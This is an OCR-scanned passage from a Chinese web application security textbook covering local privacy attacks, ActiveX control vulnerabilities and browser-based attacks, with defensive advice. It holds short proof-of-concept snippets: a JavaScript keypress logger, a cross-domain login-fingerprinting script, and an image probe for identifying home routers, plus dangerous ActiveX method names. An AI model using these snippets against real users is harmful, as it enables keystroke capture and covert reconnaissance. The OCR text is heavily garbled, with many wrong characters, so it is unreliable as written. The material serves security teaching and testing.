在 链接 中 注入 奋 干 所 需 的 参数 , 甚至 利用 本 站 重 定 回 功 能 , 以 放 使 用 户 执 行 正 第 情况 下 受 反 CSRF 
防御 保护 的 复杂 操作 。 此 外 , 攻击 者 还 可 以 使 用 多 级 URL 纺 码 ,， 在 一 个 URL 中 注入 几 个 攻击 。 在 
这 种 情况 下 ， 当 用 户 符 试 阅读 邮件 时 ， 将 执行 一 个 操作 ， 而 当 用 户 答 试 返回 收 件 箱 时 ， 则 会 执行 
妨 一 个 操作 。 


13.5 ”本 地 隐私 攻击 


许多 用 户 从 共享 的 环境 中 访问 Web 应 用 程序 , 这 时 ,攻击 者 可 直接 访问 用 户 访问 的 同一 台 计 
算 机 。 在 这 种 情况 下 ， 如 果 应 用 程序 存在 漏洞 ,它们 的 用 户 就 易于 受到 一 系列 攻击 。 这 类 攻击 主 
要 针对 以 下 领域 。 
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注解 ”应 用 程序 可 能 会 采用 各 种 机 制 在 用 户 的 计算 机 上 存储 敏感 信息 。 许 多 时 候 ， 为 
测试 应 用 程序 是 否 采用 了 茶 种 存储 机 制 ， 最 好 是 使 用 完全 “干净 ”的 浏览 器 ， 以 便于 
接受 测试 的 应 用 程序 存储 的 数据 不 会 丢失 在 已 存储 的 现 有 数据 中 。 要 做 到 这 一 点 ， 最 





理想 的 方法 ， 是 使 用 包含 全 新 安装 的 操作 系统 和 任何 浏览 器 的 虚拟 机 。 

此 外 ， 在 某 些 操 作 系 统 上 ， 在 使 用 文件 系统 内 置 的 管理 器 时 ， 和 包含 术 地 存储 数据 
的 文件 和 文件 夹 在 默认 情况 下 可 能 处 于 隐藏 状态 。 为 确保 标识 所 有 相关 数据 ， 应 将 计 
算 机 配置 为 显示 所 有 隐藏 文件 和 操作 系统 文件 。 





13.5.1 持久 性 cookie 


一 些 应 用 程序 将 敏感 数据 保存 在 持久 性 cookie 中 ， 大 多 数 浏览 带 将 该 cookie 存 放 在 本 地 文件 
系统 上 。 











ET 


(1) 检查 应 用 程序 解析 过 程 中 ( 请 参阅 第 4 章 了 解 相关 内 容 ) 确定 的 所 有 cookie。 如 朱 发 现 





有 任何 set-cookie 指 令 包 含 将 来 日 期 的 sexpires 属 性 ， 那 么 浏览 需 会 将 相关 cookie 保 存 到 这 
个 日 期 。 例 如 : 

UID=d475dfc6eccca72d0e expires=Fri, 10-Aug-18 16:08:29 GMT; 

(2) 如 采 某 个 持久 性 cookie 中 包含 任何 敏感 数据 , 本 地 攻击 者 就 能 够 截获 这 些 数据 。 即 使 持 
入 性 cookie 中 包含 的 是 加 密 信 ， 但 如 有 末 这 个 但 发 挥 看 非常 关键 的 作用 〈 如 不 震 用 户 输入 证 书 即 
可 重新 验证 其 身份 )， 则 截获 这 个 值 的 攻击 者 根本 不 用 破 详 它 的 内 容 ， 束 可 以 将 它 重新 提交 给 
应 用 程序 ( 请 参阅 第 6 章 了 解 相 关内 容 )。 


尝试 访问 


http://mdsec.net/auth/227/ 




















13.5.2 ”缓存 Web 内 容 


大 多 数 浏 览 带 将 非 SSL Web 内 容 保存 在 缓存 中 ， 除 非 Web 站 点 特别 指示 不 要 这 样 做 。 绥 存 数 
据 一 般 保存 在 本 地 文件 系统 中 。 





渗透 测试 步 又 


(1) 对 于 任何 通过 HTTP 访 问 和 包含 敏感 数据 的 应 用 程序 页 面 ， 应 检查 服务 融 啊 应 的 内 容 ， 
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确定 所 有 缓存 指令 se O 
(2) 下 面 的 指令 可 阻止 浏览 硕 绥 存 革 个 页 面 。 注 意 ， 这 些 指令 可 以 在 HTTP 啊 应 消息 头 或 
HTML 元 标签 中 指定 。 


Expires: 0 





Cache-control: no-cache 
Pragma: no-cache 


(3) 如 采 未 发 现 这 些 指 令 ， 相 关 页 面 很 可 能 会 被 一 个 或 儿 个 浏览 硕 绥 存 。 注 意 ， 每 个 页 面 
都 会 执行 缓存 指 令 ， 因 此 必须 检查 每 一 个 基于 HTTP 的 敏感 页 面 。 
(4) 为 确保 缓存 敏感 信息 ,应 使 用 一 个 默认 安 闭 的 标准 浏览 需 , 如 Internet Explorer 或 Firefox。 
在 浏览 硕 的 配置 中 , 完全 清 除 它 的 缓存 和 全 部 cookie, 然后 访问 包含 敏感 数据 的 应 用 程序 页 面 。 
检查 出 现在 绥 存 中 的 文件 , 看 其 中 是 否 包 含 敏感 数据 。 如 采 有 大 量 文件 生成 ， 可 以 从 页 面 的 源 
代码 中 提取 一 个 特殊 的 字符 串 ， 并 在 绥 存 中 搜索 该 字符 串 。 
第 用 浏 响 佛 的 默认 缓存 位 置 如 下 。 
口 Internet Explorer C:\Documents and Settings\ 用 户 名 \Local Settings\Temporary Internet 
Files\Content.IE5 的 子 日 录 。 
注意 ， 在 Windows os 要 查看 这 个 文件 夹 ， 必 须 输 入 准确 的 路 径 并 显示 隐藏 的 
文件 来， 或 通过 命令 行 浏览 至 这 个 文件 夹 。 
口 Firefox ( Windows 中 ) 一 一 C:\Documents and Settings\ 用 户 名 \Local Settings\Application 
Data\Mozilla\Firefox\Profiles\ 配 置 文件 名 \Cache。 
口 Firefox (Linux 中 ) 一 一 ~/.mozilla/firefox/ 配 置 文件 名 /Cache。 















































尝试 访 问 


http://mdsec.net/auth/249/ 


13.5.3 浏览 历史 记录 
许多 浏览 各 都 保存 有 浏览 历史 记录 ， 其 中 可 能 包含 通过 URL 参 数 传 送 的 任何 敏感 数据 。 








渗透 秀 测试 步 





Ts 中 通过 URL 参 数 传送 敏感 数据 的 任何 情况 。 
(2) 如 果 存 在 这 样 的 情况 ， 应 检查 浏览 带 的 历史 记录 ， 证 实 这 些 数据 已 经 你 存在 那里 。 


党 试 访 问 


http://mdsec.net/auth/90/ 
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13.5.4 自动 完成 


许多 浏览 硕 对 基于 文本 的 输入 字段 执行 一 项 可 由 用 户 配置 的 目 动 完 成 功能 , 这 些 字 段 可 保存 
诸如 信用 卡号 码 、 用 户 名 与 密码 之 类 的 敏感 数据 。Internet Explorer 与 Firefox 分 别 将 目 动 完成 数据 
保存 在 注册 表 与 文件 系统 中 。 

如 前 所 述 ， 除 可 被 本 地 攻击 者 访问 外 ， 在 某 些 情况 下 ,保存 在 自动 完成 缓存 中 的 数据 也 可 通 
过 XSS 攻 击 获取 。 











渗透 测试 步骤 

(1) 检查 可 从 其 文本 字段 中 获取 敏感 数据 的 任何 表单 的 HIML 源 代码 。 

(2) 如 果 没 有 在 表单 标签 或 输入 字段 的 标签 中 设置 autocomplete=off 属 性， 输入 的 数据 
将 保存 在 已 司 用 目 劲 完成 的 浏览 柄 中 。 


尝试 访问 

















http://mdsec.net/auth/260/ 


13.5.5” Flash 本 地 共享 对 象 


Flash 浏 览 硕 扩展 实施 它 目 己 的 本 地 存储 机 制 ， 这 种 机 制 称 为 本 地 共享 对 象 (LSO )， 也 称 为 
Flash cookie。 与 其 他 多 数 机 制 不 同 , 存储 在 LSO 中 的 数据 可 在 不 同 的 浏览 硕 之 间 共 享 ， 只 是 这 些 
浏览 硕 安 痛 了 Flash 扩 展 。 

















渗透 测试 步骤 
(1) 有 一 些 用 于 Firefox 的 插件 ( 如 BetterPrivacy ) 可 浏览 由 个 体 应 用 程序 创建 的 LSO 数 据 。 
(2) 可 以 直接 查看 磁盘 上 的 原始 LSO 数 据 的 内 容 。 这 些 数据 的 位 置 因 浏览 器 和 操作 系统 而 








异 。 例 如 ， 对 于 最 新 版 本 的 Internet Explorer，LSO 数 据 位 于 以 下 文件 夹 中 : 
Ci:\Users\{ 用 户 名 AppData\Roamine\Macromedia\Flash Player\#SharedObjects\{ 随 机 汶 { 域 
名 \{ 存 储 名 \\{SWF 文 件 名 } 


尝试 访问 


http://mdsec.net/auth/245/ 


13.5.6 ”Silverlight 独 立 存储 
Silverlight 浏 览 硕 扩展 实施 目 己 的 本 地 存储 机 制 ， 这 种 机 制 称 为 Silverlight 独 立 存 储 。 
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渗透 测试 步 又 





可 以 直接 查看 磁盘 上 的 原始 Silverlight 独 立 存 储 数 据 的 内 容 。 对 于 最 新 版 本 的 Internet 
Explorer， 这 些 数据 存储 在 以 下 位 置 的 一 系列 多 层 航 套 、 随 机 命名 的 文件 夹 中 : 
Ci:\Users\{ 用 户 名 i\AppData\LocalLow\Microsoft\Silverlight\ 





尝试 访问 
http://mdsec.net/auth/239/ 





13.5.7 Internet Explorer userData 


Internet Explorer 实 施 日 己 的 本 地 存储 机 制 ， 这 种 机 制 称 为 userData。 


渗透 测试 步 双 








可 以 直接 查看 存储 磁 熏 上 下 的 userData 中 的 原始 数据 的 内 容 。 对 于 最 新 版 本 的 Internet 
Explorer， 这 些 数据 位 于 以 下 文件 夹 中 : 
C:\Users\user\AppData\Roaming\Microsoft\Internet ExploreUSserData\LowA{ 随 机 } 





尝试 访问 
http://mdsec.net/auth/232/ 
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13.5.8 HTML5 本 地 存储 机 制 


HTML5 正 引入 一 系列 新 的 本 地 存储 机 制 ， 它 们 包括 : 
吕 会 话 存储 ; 
口 本 地 存储 ; 
口 数据 库存 储 。 
这 些 机 制 的 规范 和 用 法 仍 在 开发 阶段 。 并 非 所 有 浏览 絮 都 实施 了 所 有 这 些 机 制 , 测试 其 用 法 
及 查看 存储 的 任何 数据 的 方式 因 浏 览 絮 而 异 。 


13.5.9 防止 本 地 隐私 攻击 


即使 敏感 数据 经 过 加 蜜 ， 应 用 程序 也 应 避免 将 其 保存 在 持久 性 cookie 中 。 因 为 截获 这 些 数据 
的 攻击 者 可 重新 将 其 提交 给 应 用 程序 。 

应 用 程序 应 使 用 适当 的 缓存 指令 防止 浏览 融 保 存 敏感 数据 。 在 ASP 应 用 程序 中 ， 下 面 的 指示 
将 在 服务 甫 中 包含 必要 的 指令 : 
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<%S Response.CacheControl = "no-cache" 省 > 
< 务 Response.AddHeader "Pragma", "no-cache" %$> 
< 务 Response.Expires = 0 %> 





在 Java 应 用 程序 中 ， 可 使 用 以 下 命令 达到 相同 的 目的 : 


Q 
区 汉 





response.setHeader ("Cache-Control", "no-cache"): 
response.setHeader ("Pragma", "no-cache"):; 





response.setDateHeader ("Expires'", 0); 


应 用 程序 决 不 能 使 用 URL 传 送 敏感 数据 , 因为 有 许多 位 置 都 可 能 记录 这 些 URL。 应 用 程序 应 
使 用 通过 PosT 方 法 提交 的 HTML 表 单传 送 所 有 这 些 数据 。 

任何 时 候 ， 如 采用 户 在 文本 输入 字段 中 项 和 敏感 数据 ， 都 应 在 表单 或 字段 标签 中 指定 
autocomplete=off 属 性 。 

其 他 客户 端 存 储 机 制 ， 如 HTML5 即 将 引入 的 新 功能 ， 将 为 应 用 程序 提供 实施 重要 功能 的 机 
会 ,包括 更 快速 地 访问 特定 的 用 户 数据 ,并 能 够 在 网 络 访问 不 可 用 时 继续 工作 。 如 采 需 要 在 本 地 
存储 敏感 数据 ， 最 好 是 对 这 些 数据 进行 加 密 ， 以 防止 攻击 者 下 接 访问 它们 。 此 外 ,应 告知 用 户 存 储 
在 本 地 的 数据 的 本 质 ， 疝 他 们 警告 攻击 者 本 地 访问 这 些 数据 的 风险 ， 以 便 其 在 需要 时 禁用 此 功能 。 
































13.6 ”攻击 ActiveX 控 件 


如 我 们 在 第 5 董 中 所 述 ， 应 用 程序 可 以 使 用 各 种 厚 客 户 痢 技术 将 它 的 一 些 处 理 操 作 分 配给 客 
户 问 完成 。ActiveX 控 件 对 于 针对 其 他 用 户 的 攻击 者 特别 有 用 。 如 来 应 用 程序 安 狐 了 一 个 可 从 日 
己 的 页 面 调用 的 控件 ， 该 控件 必须 注册 为 “脚本 执行 安全 ”"。 这 样 ， 用 户 访问 的 任何 其 他 Web 站 
点 都 能 够 使 用 这 个 控件 。 
通 笛 ,浏览 希 并 不 接受 Web 站 点 要 求 它们 安 猴 的 任何 ActiveX 探 件 。 黑 认 情 况 下 ， 当 Web 站 点 
试图 安装 某 个 控件 时 , 浏览 硕 会 显示 一 个 安全 和 警报， 要求 得 到 用 户 许可 。 是 否 信任 发 布 该 控件 的 
Web 站 点 以 及 是 否 允 许 安 痛 该 控件 ， 将 由 用 户 目 行 决 是 。 但 是 ， 如 于 用 户 安 竣 该 控件 ， 并 且 其 中 
包含 任何 漏洞 ， 则 用 户 访问 的 任何 恶意 Web 站 点 都 可 以 利用 这 些 漏洞 。 
ActiveX 控 件 中 和 凋 见 的 对 攻击 者 有 用 的 漏洞 主要 分 为 两 类 。 
口 由 于 ActiveX 控 件 通 常 以 C/C++ 之 类 的 本 地 语言 编写 ， 它 们 之 中 很 可 能 存在 一 些 典 型 的 软 
件 漏洞 ， 如 绥 冲 区 溢出 、 整 数 漏洞 以 及 格式 字符 串 漏洞 ( 请 参阅 第 16 划 了解 详情 )。 人 们 
已 经 在 流行 Web 应 用 程序 ( 如 在 线 赠 博 站 点 ) 发 布 的 ActiveX 控 件 中 发 现 了 大 量 这 些 类 型 
的 汤 洞 。 通 第 ， 攻 击 者 可 以 利用 这 些 汤 洞 在 受害 用 户 的 计算 机 上 执行 任意 代码 。 

口 许多 ActiveX 控 件 中 包含 一 些 本 质 上 存在 风险 、 昂 被 滥用 的 方法 。 


国 LaunchExe (BSTR ExeName) 















































国 SaveFile(BSTR FileName, BSTR Ur1) 
国 LoadLibrary (BSTR LibrarypPath) 


国 ExecuteCommand (BSTR Command) 
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开发 者 往往 会 执行 这 些 方法 来 提高 控件 的 灵活 性 ， 以 便于 将 来 扩展 控件 的 功能 ， 而 不 必 部 署 
全 新 的 控件 。 但 是 , 一 旦 安 疹 了 这 些 控件 , 任何 恶意 站 点 当然 也 可 以 通过 同样 的 方式 对 其 进行 “ 扩 
展 "”， 从 而 执行 针对 用 户 的 恶意 操作 。 





13.6.1 查找 ActiveX 漏 洞 


当 应 用 程序 安装 ActiveX 控 件 时 ， 除 浏览 融会 显示 一 个 要 求 获 得 安 竣 控件 许可 的 和 警报 外 ， 
应 该 可 以 在 某 个 应 用 程序 页 面 的 HTML 源 代码 中 看 到 类 似 于 下 面 的 代码 : 


<object 1i19G="oMyObject”" 
classid="CLSID:AS61BC839-5188-4AF9-76AF-109016FD8901" 
codebase="https://wahh-app.com/bin/myobject.cab"”> 














</object> 

这 段 代码 告诉 浏览 器 用 指定 的 名 称 和 classid 示 例 化 ActiveX 控 件 ， 并 从 指定 的 URL 下 载 该 
控件 。 如 果 浏 览 硕 中 已 经 安装 有 控件 ， 就 不 需要 使 用 codqebase 参 数 ， 浏 览 希 会 根据 控件 的 唯一 
classid， 从 本 地 计算 机 中 找到 该 控件 。 

如 采用 户 允 许 安装 这 个 控件 , 浏览 各 会 将 其 0 “脚本 执行 安全 ”。 这 总 味 着 将 来 任何 Web 
站 点 都 可 以 将 其 示例 化 ， 并 调用 它 的 方法 。 可 以 通过 检查 注册 表 项 HKEY_CLASSES_ROOT\ 
CLSID\ 从 上 面 的 HTML 中 提取 的 控件 class ee Categories 人 确认 这 一 点 。 如果 其 中 存在 
ee 9882-11CF-9FA9-00AA006C42C4， 则 表示 该 控件 已 经 注册 为 “脚本 执行 安 

， 如 图 13-6 所 示 。 


区 "Registry Editor 本 -Io|x! 
File Edit View Favorites Help 
由 . 国 {0C116523-3028-11D2-8A05-00104B9B48AB} 
由 . 国 !0C122CB6-CD8E-40CE-BE4A-080C2FF3E2BF} 
日 - 国 {0C16C27E-A65E7-11DO-BFC3-0020F8008024} 
日 - 园 Implemented Categories 
司 1zDD95801-9882-11CF-9FA9-DDAADD6C42C34+ 
园 {7DD95802-9882-11CF-9FA9-00AA006C42C4} 
转 InProcServer32 
国 FrogID 
Hd {0C1EB979-8EC7-46E8-8097-245957D6B94CY 
由 . 国 10C209677-473C-3972-BE36-56B7559ES5C9E} 
相同 JnC76321n-nFRR-11D3-PRRn-nncn4F7oF4791 


















| Type 
lab] (Default) REG_SZ 








恒 


My Computer\HKEY_CLASSES_ROOT\CLSIDVOC16C27E-A6E7-11D0-BFC3-0020F8008024}\Implemented Categories\{7DD95801-98 | 
| 


图 13-6 已 注册 为 “脚本 执行 安全 ”的 控件 
浏览 硕 示 例 化 ActiveX 控 件 后 ， 就 可 以 通过 以 下 脚本 调用 它 的 方法 : 


<ScCript> 











document .oMyObject .LaunchExe ('myApPpPDemo .exe' ): 
</Script> 


渗透 秀 测试 步骤 
一 种 探查 ActiveX 漏 洞 的 简单 方法 是 ， 修 改 调 用 该 控件 的 HIML 代 码 ， 癌 其 提交 目 己 的 参 
数 ， 然 后 监控 执行 结果 。 
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(1) 使 用 第 16 章 描述 的 相同 攻击 有 效 载 集 可 探查 缓冲 区 溢出 之 类 的 漏洞 。 如 果 以 不 受 控 制 
的 方式 触发 这 种 漏洞 ， 很 可 能 会 导致 负责 该 控件 执行 的 浏览 器 进程 朋 溃 。 

(2) 本 质 上 存在 风险 的 方法 通过 其 名 称 即 可 确定 ， 如 LaunchExe。 在 其 他 情况 下 ， 控 件 名 称 
可 能 无 害 或 含义 模糊 , 但 有 时 ,一些 有 用 的 数据 ， 如 文件 名 、URL 或 系统 命令 ,明显 被 用 作 控 
件 的 参数 。 应 该 尝试 将 这 些 参数 修改 为 任意 值 ， 确 定 控件 是 否 按 预计 的 方式 处 理 输入 。 


我 们 常 和 发现， 应 用 程序 并 没有 调用 控件 的 所 有 方法 。 例 如 ， 一 些 方法 主要 用 于 测试 目的 、 
一 些 已 被 取代 但 尚未 删除 、 一 些 可 能 是 为 了 方便 将 来 使 用 或 用 于 自我 更 新 目的 。 为 了 对 控件 进行 
综合 测试 ,有 必要 枚 举 出 它 通 过 这 些 方法 俊 露 的 各 种 受 攻击 面 ,并 对 这 些 受 攻击 面 进行 彻底 测试 。 

有 各 种 工具 可 用 于 枚 举 和 测试 ActiveX 控 件 方 法 。iDefense 开 发 的 COMRaider 就 是 一 个 有 用 的 
工具 ， 它 能 够 显示 一 个 控件 的 全 部 方法 ， 并 对 每 个 方法 执行 基本 的 模糊 测试 ， 如 图 13-7 所 示 。 








项 :ComRaider 口 | 


a Cu 
BB-189 classes returned ， 


oup |Progp |server : 
2407 {B09AEBSF-B1 WEZFILEVIEW C:\PROGRAM1... Sky Software Filewiew 点 ctivex Control 6.1 
后:COMRaider Only showing class Ta09x&E68F-Bld4D=z+3ED=B713=BAdl3F6033490d 


S COM Server [CAPROGRA~1WWINZIPwzfilvw.ocy ?| Show only fuzzable 


MW FileviewContral 2|lFunction CreateNewFile { 
:日 -大 Filewiew ByVal Extension fs String ， 
日 -=0 _DFileview BuUUal EditHow fs Boolean 
= BddCustomColur ) fs Boolean 
2 ddCustomCont 
i ddCustomltem 
-BackColor 
有 Checkltems 
ColumnCount 
-人 ColumnName 
Columnwidth 
CTEateNewFIle 
-2@ CreateNewFolde 
-EE CurrentFolder 
CurrentFolderDis 
于 ! CurrentPIDL 
:= DeleteCustomCc 
-2@ ExeCmdForallSe 


2 ExeCmdForFolde- Use right click menu on treeview to generate fuzz files 
» More >> Next >> | 





图 13-7 COMRaider 显 示 某 个 ActiveX 控 件 的 方法 


13.6.2 ”防止 ActiveX 漏 洞 
保护 本 地 编译 软件 组 件 的 安全 ,防止 其 受到 攻击 ， 是 一 个 广泛 而 复杂 的 话题 ,这 不 属于 本 书 
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的 讨论 范围 。 基 本 上 ，ActiveX 探 件 的 设计 者 与 开发 者 必须 确保 晋 意 Web 站 点 无 法 调用 该 控件 实 
施 的 方法 ， 用 以 对 安装 这 个 控件 的 用 户 执 行 恶 意 操 作 。 以 下 是 一 些 应 该 注音 的 问题 。 
口 应 对 控件 进行 以 安全 为 中 心 的 源 代 人 码 审查 与 渗透 测试 ， 以 确定 绥 冲 区 淤 出 之 类 的 漏洞 。 
口 控件 不 得 暴露 任何 使 用 用 户 可 控制 的 输入 调用 外 部 文件 系统 或 操作 系统 、 本 质 上 存在 风 
险 的 方法 。 只 需 稍 微 做 出 一 些 努 力 ， 就 可 以 找到 更 安全 的 蔡 代 方法 。 例 如 ， 如 果 有 必要 
启动 外 部 进程 ， 则 应 编辑 一 个 列表 ， 列 出 所 有 可 合法 、 安 全 启动 的 外 部 进程 ， 然 后 创建 
单独 的 方法 调用 每 个 进程 ,或 者 使 用 一 个 方法 提取 这 个 列表 中 的 索引 号 。 
为 进行 深层 防御 ， 一 些 ActiveX 控 件 对 发 布 HTML 页 面 (这些 控 件 即 从 中 调用 ) 的 域名 进行 
确认 。Microsoft 的 “SiteLock 活 动 模 板 库 ” 模 板 允 许 开 发 者 将 ActiveX 控 件 仪 限 于 特定 的 域名 列表 。 
一 些 控 件 甚至 更 进一步 , 要 求 提交 给 它们 的 所 有 参数 必须 使 用 加 密 签 名 。 如 果 提 交 的 签名 无 
效 , 控件 不 会 执行 请 求 的 操作 。 还 要 注意 ,如 有 果 人 允许 调用 这 些 控件 的 Web 站 点 存在 任何 XSS 漏 洞 ， 
那么 攻击 者 就 有 可 能 突破 这 类 防御 。 
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迄今 为 止 , 我 们 在 这 一 划 和 上 一 草 介 绍 的 攻击 主要 与 利用 应 用 程序 的 某 种 行为 特征 攻破 应 用 
程序 用 户 有 关 。 虽 然 某 些 攻击 技巧 需要 利用 特定 浏览 带 的 怪 阁 ,但 跨 站 点 脚本 、 跨 站 点 请 求 仿 造 
以 及 JavaScript 动 持 之 类 的 攻击 全 痢 源 于 特定 Web 应 用 程序 中 的 漏洞 。 

另 一 类 针对 用 户 的 攻击 并 不 依赖 于 特定 应 用 程序 的 行为 。 相 反 , 这 些 攻 击 主要 利用 浏览 需 的 
行为 特征 ， 或 者 核心 Web 技 术 本 号 的 设计 缺陷 。 这 些 攻击 可 能 由 任何 恶意 网 站 或 任何 本 身 已 被 攻 
破 的 “ 恨 性 ”站 点 实施 。 介 绍 Web 应 用 程序 攻击 的 书籍 通 第 都 没有 涉及 这 类 攻击 。 但 是 ,我们 有 
必要 简单 了 解 这 些 攻击 , 部 分 是 因为 它们 与 利用 应 用 程序 特定 功能 的 攻击 的 茶 些 特点 相同 。 通过 
展示 在 不 存在 任何 应 用 程序 特定 漏洞 的 情况 下 , 攻击 者 可 以 达到 什么 目的 , 这 些 攻击 还 为 我 们 了 
解 各 种 应 用 程序 行为 的 影响 提供 了 相关 信息 。 

以 下 各 部 分 的 介绍 相对 比较 简单 。 有 关 这 方面 的 主题 ,可 以 写成 一 本 书 。 拥 有 大 量 空余 时 间 
的 准 作 者 可 以 癌 Wiley 提 交 出 版 The Browser Hacker x Handbook 的 提议 。 


13.7.1 记录 键 击 


JavaScript 可 在 浏览 从 窗 口 处 于 激活 状态 时 监控 用 户 按 下 的 所 有 键 , 包括 密码 、 私 人 消息 和 其 
他 个 人 信息 。 下 面 的 概念 验证 脚本 将 截获 Internet Explorer 中 的 所 有 键 击 ， 并 在 浏览 器 的 状态 栏 中 
显示 全 部 内 容 : 


<script>document .onkeypress = function () ({ 









































window.status += String.fromCharCode (window.event.keyCode): 
} </script> 


只 有 当 运 行 上 述 代 码 的 框架 处 于 激活 状态 时 ,这 些 攻击 才能 捕获 键 击 。 但 是 ， 如 末 在 自身 页 
面 的 框架 内 通 入 了 第 三 方 小 组 件 或 广告 小 程序 , 菏 些 应 用 程序 可 能 易于 受到 键 击 记录 攻击 。 在 所 














请 的 “逆向 键 击 支持 ”攻击 中 ,在 子 框架 中 运行 的 恶意 代码 能 够 夺取 顶 层 窗 口 的 控制 权 ， 因 为 同 
源 策 略 并 不 能 阻止 这 种 操作 。 恶意 代码 可 以 通过 处 理 onkeydqown 事 件 来 捕获 键 击 , 并 且 能 够 将 单 
独 的 onkeypress 事 件 传递 给 顶层 和 窗口。 这样 ， 输 入 的 文本 仍然 会 在 顶层 窗口 中 正常 显示 。 通 过 
在 暂停 输入 时 暂时 放 径 激活 状态 ， 亚 意 代 人 码 甚至 可 以 在 顶层 窗口 内 的 正 稼 位 置 保留 显示 闪烁 的 
光标 。 


13.7.2 ” 穷 取 浏览 器 历史 记录 与 搜索 查询 


JavaScript 可 用 于 实施 蛮 力 攻击 , 查 明 用 户 最 近 访 问 的 第 三 方 站 点 以 及 他 们 在 铝 用 搜索 引擎 上 
执行 的 查询 。 在 介绍 亦 力 攻击 (实施 此 攻击 的 目的 , 是 为 了 确定 可 在 其 他 域 上 使 用 的 有 效 反 CSRF 
令 有 牌 ) 时 , 我 们 已 经 讨论 了 这 种 技巧 。 攻击 者 可 以 动态 创建 常用 Web 站 点 以 及 搜索 查询 的 超 链接 ， 
并 使 用 getcomputedSstyle API 检 查 这 些 链接 是 否 以 彩色 标记 为 “已 被 访问 ”， 从 而 完成 这 项 任 
务 。 而 且 ， 攻 击 者 可 以 迅速 检查 大 量 可 能 的 目标 ， 而 不 会 给 用 户 造 成 很 大 的 影响 。 


13.7.3” 枚 举 当 前 使 用 的 应 用 程序 


JavaScript 可 用 于 确定 用 户 当 前 是 否 登录 到 第 三 方 Web 应 用 程序 。 大 多 数 应 用 程序 都 包含 只 有 
登录 用 户 可 查看 的 页 面 ， 如 “用 户 资 料 ” 页 面 。 如 果 未 通过 验证 的 用 户 请 求 这 个 页 面 ， 将 会 收 到 
错误 消息 ， 或 者 一 个 转 回 登 录 页 面 的 重 定 回 链 接 。 

通过 对 受 保护 的 页 面 执 行 跨 域 脚本 包含 , 并 运行 定制 的 错误 处 理 程序 来 处 理 脚 本 错误 ,种 行 
为 可 确定 用 户 是 否 已 经 登录 第 三 方 Web 应 用 程序 : 


Window.onerror = fingerprint; 









































<script src="https://other-app.com/MyDetails.aspx"></script> 

当然 ,无 论 受 保护 的 页 面 处 于 什么 状态 ， 由 于 它 仪 包含 HTML 内 容 ， 因 此 这 时 将 会 出 现 一 个 
JavaScript 销 误 。 重 要 的 是 ， 根 据 实际 返回 的 HIML 文 档 ， 该 错误 将 包含 不 同 的 行 号 与 销 误 类 型 。 
接 下 来 ， 攻 击 者 可 以 运行 错误 处 理 程序 (在 fingerprint 图 数 中 )， 检 查 用 户 登 录 时 产生 的 行 号 
与 错误 类 型 ,尽管 应 用 程序 实施 了 同 源 集 略 ,但 攻击 者 的 脚本 仍然 能 够 推 凯 出 受 保护 页 面 的 状态 。 

确定 用 户 当 前 登录 哪些 弟 用 的 第 三 方 应 用 程序 后 , 攻击 者 就 可 以 执行 针对 性 极 强 的 器 站 点 请 
求 伪造 攻击 ， 以 被 攻破 的 用 户 号 份 在 应 用 程序 中 执行 任意 操作 。 




















13.7.4 ”端口 扫 拉 


JavaScript 可 对 用 户 本 地 网 络 或 其 他 可 访问 的 网 络 上 的 主机 进行 并 口 扫描 ,以 确定 可 被 利用 的 
服务 。 如 采用 户 受 到 企业 或 家 庭 防火 二 的 保护 , 攻击 者 将 能 够 到 达 无 法 通过 公共 互联 网 访问 的 服 
务 。 如 果 攻 击 者 扫 质 客户 端 计 算 机 的 回环 接口 ， 就 能 够 避 开 用 户 安 闻 的 任何 个 人 防火 墙 。 

基于 浏览 硕 的 端口 扫描 可 使 用 Java applet 确 定 用 户 的 IP 地 址 ( 可 能 进行 了 网 络 地 址 转换 )， 从 
而 推 上 新 出 本 地 网 络 的 卫 范 围 。 然 后 ， 脚 本 和 试 与 任意 主机 和 端口 建立 连接 ， 以 测试 连通 性 。 如 前 
所 述 ， 同 源 策略 阻止 脚本 处 理 这 些 请 求 的 啊 应 。 但 是 , 在 检测 登录 状态 时 使 用 的 相似 技巧 也 可 用 
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于 测试 网 络 连通 性 。 这 时 ， 攻 击 者 的 脚本 尝试 从 每 个 目标 主机 和 问 口 动态 加 载 并 执行 一 段 脚 本 。 
如 果 那 个 端口 上 有 Web 服 务 需 正在 运行 ， 它 将 返回 HTML 或 其 他 一 些 内 容 ， 生 成 端口 扫描 脚本 能 
够 检测 到 的 JavaScript 错 误 。 否则 ,连接 尝试 将 会 超时 或 不 返回 任何 数据 ,在 这 种 情况 下 不 会 导致 
错误 。 因此 , 尽管 应 用 程序 实施 同 源 限制 , 端口 扫描 脚本 仍然 能 够 确定 任意 主机 和 端口 的 连通 性 。 

请 注意 ， 大 多 数 浏 览 需 都 在 可 以 使 用 HTTP 访 问 的 端口 上 实施 了 限制 ， 并 阻止 了 其 他 主要 服 
务 稼 用 的 端口 (如 用 于 SMTP 的 问 口 25 )。 但 是 ,通过 利用 相关 漏洞 ， 可 以 突破 这 些 浏览 硕 实 施 的 
限制 。 


13.7.5 攻击 其 他 网 络 主机 


成 功 使 用 端口 扫描 确定 其 他 主机 后 ， 就 可 以 使 用 一 段 恶意 脚本 尝试 标识 每 一 个 发 现 的 服务 ， 
然后 通过 各 种 方法 实施 攻击 。 

许多 Web 服 务 器 包含 位 于 特殊 URL 位 置 的 图 像 文件 。 下 面 的 代码 检查 一 幅 与 一 系列 常用 DSL 
路 由 器 有 关 的 图 像 : 

<img src="http://192.168.1.1/hm icon.gif" onerror='"'notNetgear!)}"> 

如 采 notNetgeazr 国 数 未 被 调用 ,， 则 说 明 服 务 硕 已 被 成 功 标 识 为 NETGEAR 路 由 硕 。 接 下 来 ， 
脚本 可 通过 利用 特定 软件 中 任何 已 知 的 漏洞 ， 或 执行 请 求 伪造 攻击 ， 继 续 攻击 Web 服 务 器 。 在 本 
示例 中 ,攻击 者 可 以 尝试 使 用 默认 证 书 登 录 路 由 器 ,并 对 路 由 器 进行 重新 配置 ,以 打开 其 外 部 接 
口上 的 其 他 端口 ,或 向 外 界 披露 它 的 管理 功能 。 注 意 , 许多 这 种 非常 有 效 的 攻击 只 需要 提出 任意 
请 求 ， 而 不 需要 处 理 它们 的 响应 ， 因 此 不 会 受到 同 源 策略 的 限制 。 

在 某 些 情况 下 ， 攻 击 者 可 以 利用 DNS 重新 绑 定 (DNS rebinding ) 技巧 违反 同 源 策略 ， 从 本 地 
网 络 中 的 Web 服 务 器 中 检索 内 容 。 这 些 攻击 将 在 本 章 后 面 讨论 。 









































13.7.6 ”利用 非 HTTP 服 务 


